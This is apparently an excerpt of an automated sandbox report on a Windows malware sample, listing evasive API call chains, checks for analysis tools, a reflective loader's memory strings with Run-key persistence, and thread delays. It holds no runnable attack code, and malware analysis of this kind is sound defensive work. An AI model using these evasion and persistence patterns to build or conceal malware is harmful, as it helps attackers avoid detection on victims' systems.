                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          barindex
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_6-1479
                          Source: C:\Windows\System32\msiexec.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_9-1482
                          Source: C:\Windows\System32\msiexec.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_9-1160
                          Source: C:\Windows\System32\svchost.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_2-1145
                          Source: C:\Windows\System32\svchost.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_2-1438
                          Source: C:\Windows\System32\audiodg.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_8-1146
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_6-1199
                          Source: C:\Windows\explorer.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_5-39086
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_0-1150
                          Source: C:\Windows\System32\audiodg.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_8-1477
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_0-1431
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: mggoBrtk9t.exe, svchost.exe, A629855EB2A22925382193.exe, audiodg.exe, msiexec.exeBinary or memory string: PROCMON.EXE
                          Source: mggoBrtk9t.exe, svchost.exe, A629855EB2A22925382193.exe, audiodg.exe, msiexec.exeBinary or memory string: PROCESSHACKER.EXE
                          Source: mggoBrtk9t.exe, svchost.exe, A629855EB2A22925382193.exe, audiodg.exe, msiexec.exeBinary or memory string: X64DBG.EXE
                          Source: mggoBrtk9t.exe, svchost.exe, A629855EB2A22925382193.exe, audiodg.exe, msiexec.exeBinary or memory string: AUTORUNS.EXE
                          Source: msiexec.exe, 0000000F.00000002.1523544846.00007FF63B525000.00000002.00000400.00020000.00000000.sdmpBinary or memory string: ZEROX64MADE IN ALGERIA <3REFLECTIVELOADERSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNGQGWZDSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\RUNSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\STARTUPFOLDER.EXELOADLIBRARYAKERNEL32.DLLGETPROCADDRESSKERNEL32.DLLWCSCPYMSVCRT.DLLWCSCATMSVCRT.DLLWCSCMPMSVCRT.DLLWCSNCPYMSVCRT.DLLWCSLENMSVCRT.DLLSTRLENMSVCRT.DLLREALLOCMSVCRT.DLLFREEMSVCRT.DLLWCSSTRMSVCRT.DLLGETWINDOWSDIRECTORYWKERNEL32.DLLGETVOLUMEINFORMATIONWKERNEL32.DLLLSTRCATWKERNEL32.DLLSETFILEATTRIBUTESWKERNEL32.DLLCLOSEHANDLEKERNEL32.DLLGETVERSIONEXAKERNEL32.DLLDELETEFILEWKERNEL32.DLLCREATEDIRECTORYAKERNEL32.DLLGETFILEATTRIBUTESAKERNEL32.DLLGETMODULEFILENAMEAKERNEL32.DLLCOPYFILEAKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLCREATEFILEAKERNEL32.DLLHEAPALLOCKERNEL32.DLLGETPROCESSHEAPKERNEL32.DLLEXPANDENVIRONMENTSTRINGSWKERNEL32.DLLRESUMETHREADKERNEL32.DLLSETTHREADCONTEXTKERNEL32.DLLRTLCOMPAREMEMORYKERNEL32.DLLVIRTUALALLOCEXKERNEL32.DLLGETMODULEHANDLEAKERNEL32.DLLGETTHREADCONTEXTKERNEL32.DLLGETMODULEFILENAMEWKERNEL32.DLLVIRTUALPROTECTEXKERNEL32.DLLGETLASTERRORKERNEL32.DLLRELEASEMUTEXKERNEL32.DLLCREATEMUTEXAKERNEL32.DLLHEAPFREEKERNEL32.DLLWAITFORSINGLEOBJECTKERNEL32.DLLCREATETHREADKERNEL32.DLLCHECKREMOTEDEBUGGERPRESENTKERNEL32.DLLGETCURRENTPROCESSKERNEL32.DLLISDEBUGGERPRESENTKERNEL32.DLLEXITPROCESSKERNEL32.DLLDELETEFILEAKERNEL32.DLLPROCESS32NEXTWKERNEL32.DLLTERMINATEPROCESSKERNEL32.DLLOPENPROCESSKERNEL32.DLLPROCESS32FIRSTWKERNEL32.DLLCREATETOOLHELP32SNAPSHOTKERNEL32.DLLSETENDOFFILEKERNEL32.DLLLSTRCMPAKERNEL32.DLLWRITEPROCESSMEMORYKERNEL32.DLLREADPROCESSMEMORYKERNEL32.DLLGETFILESIZEKERNEL32.DLLWRITEFILEKERNEL32.DLLADJUSTTOKENPRIVILEGESADVAPI32.DLLOPENPROCESSTOKENADVAPI32.DLLLOOKUPPRIVILEGEVALUEWADVAPI32.DLLGETTOKENINFORMATIONADVAPI32.DLLCREATEFILEWKERNEL32.DLLSHGETFOLDERPATHWSHELL32.DLLSHGETFOLDERPATHASHELL32.DLLLSTRCATAKERNEL32.DLLSETFILEATTRIBUTESAKERNEL32.DLLSHGETKNOWNFOLDERPATHSHELL32.DLLFREELIBRARYKERNEL32.DLLMOVEFILEWKERNEL32.DLLGETFILESIZEEXKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLGETVOLUMEINFORMATIONAKERNEL32.DLLGETTICKCOUNTKERNEL32.DLLWSPRINTFWUSER32.DLLWSPRINTFAUSER32.DLLVIRTUALALLOCKERNEL32.DLLREADFILEKERNEL32.DLLSLEEPKERNEL32.DLLVIRTUALFREEKERNEL32.DLLSETFILEPOINTERKERNEL32.DLLCREATEDIRECTORYWKERNEL32.DLLFINDFIRSTFILEWKERNEL32.DLLFINDNEXTFILEWKERNEL32.DLLFINDCLOSEKERNEL32.DLLCOPYFILEWKERNEL32.DLLWRITEFILEKERNEL32.DLLGETSYSTEMDIRECTORYWKERNEL32.DLLEXITPROCESSKERNEL32.DLLCREATEREMOTETHREADKERNEL32.DLLINTERNETOPENURLWWININET.DLLINTERNETREADFILEWININET.DLLHTTPQUERYINFOAWININET.DLLINTERNETOPENWWININET.DLLINTERNETCONNECTWWININET.DLLHTTPOPENREQUESTWWININET.DLLHTTPSENDREQUESTAWININET.DLLINTERNETCLOSEHANDLEWININET.DLLPATHISURLWSHLWAPI.DLLPATHCOMBINEWSHLWAPI.DLLPATHFINDFILENAMEWSHLWAPI.DLLSTRSTRASHLWAPI.DLLURLDOWNLOADTOFILEWURLMON.DLLCREATEPROCESSWKERNEL32.DLLSHELLEXECUTEWSHELL32.DLLGETMODULEFILENAMEWKERNEL32.DLLGETSHORTPATHNAMEWKERNEL32.DLLGETENVIRONMENTVARIABLEWKERNEL32.DLLREGOPENKEYEXWADVAPI32.DLLREGSETVALUEEXW
                          Source: mggoBrtk9t.exe, svchost.exe, A629855EB2A22925382193.exe, audiodg.exe, msiexec.exeBinary or memory string: IDAQ.EXE
                          Source: A629855EB2A22925382193.exe, 0000000C.00000003.1522088582.00000000033A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: HZEROX64MADE IN ALGERIA <3REFLECTIVELOADERSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNGQGWZDSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\RUNSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\STARTUPFOLDER.EXELOADLIBRARYAKERNEL32.DLLGETPROCADDRESSKERNEL32.DLLWCSCPYMSVCRT.DLLWCSCATMSVCRT.DLLWCSCMPMSVCRT.DLLWCSNCPYMSVCRT.DLLWCSLENMSVCRT.DLLSTRLENMSVCRT.DLLREALLOCMSVCRT.DLLFREEMSVCRT.DLLWCSSTRMSVCRT.DLLGETWINDOWSDIRECTORYWKERNEL32.DLLGETVOLUMEINFORMATIONWKERNEL32.DLLLSTRCATWKERNEL32.DLLSETFILEATTRIBUTESWKERNEL32.DLLCLOSEHANDLEKERNEL32.DLLGETVERSIONEXAKERNEL32.DLLDELETEFILEWKERNEL32.DLLCREATEDIRECTORYAKERNEL32.DLLGETFILEATTRIBUTESAKERNEL32.DLLGETMODULEFILENAMEAKERNEL32.DLLCOPYFILEAKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLCREATEFILEAKERNEL32.DLLHEAPALLOCKERNEL32.DLLGETPROCESSHEAPKERNEL32.DLLEXPANDENVIRONMENTSTRINGSWKERNEL32.DLLRESUMETHREADKERNEL32.DLLSETTHREADCONTEXTKERNEL32.DLLRTLCOMPAREMEMORYKERNEL32.DLLVIRTUALALLOCEXKERNEL32.DLLGETMODULEHANDLEAKERNEL32.DLLGETTHREADCONTEXTKERNEL32.DLLGETMODULEFILENAMEWKERNEL32.DLLVIRTUALPROTECTEXKERNEL32.DLLGETLASTERRORKERNEL32.DLLRELEASEMUTEXKERNEL32.DLLCREATEMUTEXAKERNEL32.DLLHEAPFREEKERNEL32.DLLWAITFORSINGLEOBJECTKERNEL32.DLLCREATETHREADKERNEL32.DLLCHECKREMOTEDEBUGGERPRESENTKERNEL32.DLLGETCURRENTPROCESSKERNEL32.DLLISDEBUGGERPRESENTKERNEL32.DLLEXITPROCESSKERNEL32.DLLDELETEFILEAKERNEL32.DLLPROCESS32NEXTWKERNEL32.DLLTERMINATEPROCESSKERNEL32.DLLOPENPROCESSKERNEL32.DLLPROCESS32FIRSTWKERNEL32.DLLCREATETOOLHELP32SNAPSHOTKERNEL32.DLLSETENDOFFILEKERNEL32.DLLLSTRCMPAKERNEL32.DLLWRITEPROCESSMEMORYKERNEL32.DLLREADPROCESSMEMORYKERNEL32.DLLGETFILESIZEKERNEL32.DLLWRITEFILEKERNEL32.DLLADJUSTTOKENPRIVILEGESADVAPI32.DLLOPENPROCESSTOKENADVAPI32.DLLLOOKUPPRIVILEGEVALUEWADVAPI32.DLLGETTOKENINFORMATIONADVAPI32.DLLCREATEFILEWKERNEL32.DLLSHGETFOLDERPATHWSHELL32.DLLSHGETFOLDERPATHASHELL32.DLLLSTRCATAKERNEL32.DLLSETFILEATTRIBUTESAKERNEL32.DLLSHGETKNOWNFOLDERPATHSHELL32.DLLFREELIBRARYKERNEL32.DLLMOVEFILEWKERNEL32.DLLGETFILESIZEEXKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLGETVOLUMEINFORMATIONAKERNEL32.DLLGETTICKCOUNTKERNEL32.DLLWSPRINTFWUSER32.DLLWSPRINTFAUSER32.DLLVIRTUALALLOCKERNEL32.DLLREADFILEKERNEL32.DLLSLEEPKERNEL32.DLLVIRTUALFREEKERNEL32.DLLSETFILEPOINTERKERNEL32.DLLCREATEDIRECTORYWKERNEL32.DLLFINDFIRSTFILEWKERNEL32.DLLFINDNEXTFILEWKERNEL32.DLLFINDCLOSEKERNEL32.DLLCOPYFILEWKERNEL32.DLLWRITEFILEKERNEL32.DLLGETSYSTEMDIRECTORYWKERNEL32.DLLEXITPROCESSKERNEL32.DLLCREATEREMOTETHREADKERNEL32.DLLINTERNETOPENURLWWININET.DLLINTERNETREADFILEWININET.DLLHTTPQUERYINFOAWININET.DLLINTERNETOPENWWININET.DLLINTERNETCONNECTWWININET.DLLHTTPOPENREQUESTWWININET.DLLHTTPSENDREQUESTAWININET.DLLINTERNETCLOSEHANDLEWININET.DLLPATHISURLWSHLWAPI.DLLPATHCOMBINEWSHLWAPI.DLLPATHFINDFILENAMEWSHLWAPI.DLLSTRSTRASHLWAPI.DLLURLDOWNLOADTOFILEWURLMON.DLLCREATEPROCESSWKERNEL32.DLLSHELLEXECUTEWSHELL32.DLLGETMODULEFILENAMEWKERNEL32.DLLGETSHORTPATHNAMEWKERNEL32.DLLGETENVIRONMENTVARIABLEWKERNEL32.DLLREGOPENKEYEXWADVAPI32.DLLREGSETVALUEEX
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeMemory allocated: F70000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeMemory allocated: 2AF0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeMemory allocated: 4AF0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Windows\explorer.exeCode function: 5_2_0C5B88B0 CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,Thread32Next,CloseHandle,5_2_0C5B88B0
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeThread delayed: delay time: 180000
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeThread delayed: delay time: 180000
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\audiodg.exeWindow / User API: threadDelayed 1215Jump to behavior
                          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1518Jump to behavior
                          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 8352Jump to behavior
                          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 637Jump to behavior
                          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 629Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeWindow / User API: threadDelayed 1013Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeWindow / User API: threadDelayed 1293Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeWindow / User API: threadDelayed 3490
